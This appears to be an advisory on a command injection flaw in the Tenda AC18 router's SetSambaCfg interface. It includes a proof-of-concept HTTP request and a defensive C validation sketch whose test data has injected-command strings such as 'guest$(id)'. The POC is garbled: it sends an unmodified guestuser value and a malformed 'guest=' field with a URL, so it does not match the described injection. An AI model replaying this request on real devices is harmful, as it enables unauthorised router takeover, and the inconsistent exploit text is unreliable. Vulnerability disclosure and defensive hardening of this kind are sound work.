# Tenda AC18 Router Command Injection Vulnerability Summary

## Vulnerability Overview

This vulnerability exists in the Tenda AC18 router firmware version V15.03.05.05_multi. At the `/goform/SetSambaCfg` interface, improper handling of the `guestuser` parameter allows attackers to execute arbitrary system commands. This is a **second-order injection** vulnerability, where the malicious payload is persistently stored upon initial submission and triggered/executed in subsequent requests.

## Affected Scope

- **Vendor**: Tenda
- **Affected Product**: Tenda AC18 Router
- **Affected Firmware Version**: V15.03.05.05_multi
- **CVSS Score**: 8.8 (High)

## Remediation

- **Vendor Website**: https://www.tenda.com.cn
- **Firmware Download Link**: http://www.tenda.com.cn/material/show2610

## POC Code

```http
POST /goform/SetSambaCfg HTTP/1.1
Host: 192.168.2.1
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Origin: http://192.168.2.1
Referer: http://192.168.2.1/samba.html
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 140
Cookie: password=2e55ad283aaa498af4f46c76df33c7adavrtgb

fileCode=0T-8&password=admin&premitEn=1&guestuser=guest&guestpwd=guest&guest= http://192.168.2.148guestacc
```
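
The firmware's handler code is not shown on this page, so the following is an added example rather than Tenda's code: a sketch of how a second-order injection through a stored value such as `guestuser` is closed by checking the value both when it is saved and again when it is later used. The function names, the config slot and the tool path are hypothetical, and it assumes the stored name eventually reaches a command invocation.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#define MAX_USER_LEN 32
#define SAFE_CHARS "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" \
                   "0123456789_.-"

/* Allowlist check: 1..32 chars from SAFE_CHARS, not starting with '-'
 * (a leading dash would be parsed as an option by the called tool). */
int is_safe_username(const char *s)
{
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > MAX_USER_LEN || s[0] == '-')
        return 0;
    return strspn(s, SAFE_CHARS) == n;
}

/* Write path (hypothetical config slot): refuse to persist unsafe input. */
int store_guestuser(char *slot, size_t slot_len, const char *value)
{
    if (!is_safe_username(value) || strlen(value) >= slot_len)
        return -1;
    strcpy(slot, value);   /* length was checked against slot_len above */
    return 0;
}

/* Read path: re-validate the stored value (it may predate the write-time
 * check), then pass it as one argv element for execv(), not a shell string. */
int build_argv(const char *stored, const char *argv[], size_t argc_max)
{
    if (argc_max < 3 || !is_safe_username(stored))
        return -1;
    argv[0] = "/usr/sbin/samba_user_tool";   /* hypothetical tool path */
    argv[1] = stored;
    argv[2] = NULL;
    return 2;
}

int main(void)
{
    char slot[64] = "";
    const char *argv[3];
    int a = store_guestuser(slot, sizeof slot, "guest");     /* constructed */
    int b = store_guestuser(slot, sizeof slot, "guest;id");  /* constructed */
    int c = build_argv("guest$(id)", argv, 3);               /* constructed */
    printf("%d %d %d\n", a, b, c);
    return 0;
}
```

Validating only on the write path leaves values stored by older firmware or by other code paths unchecked, which is why the read path repeats the check before the name is used.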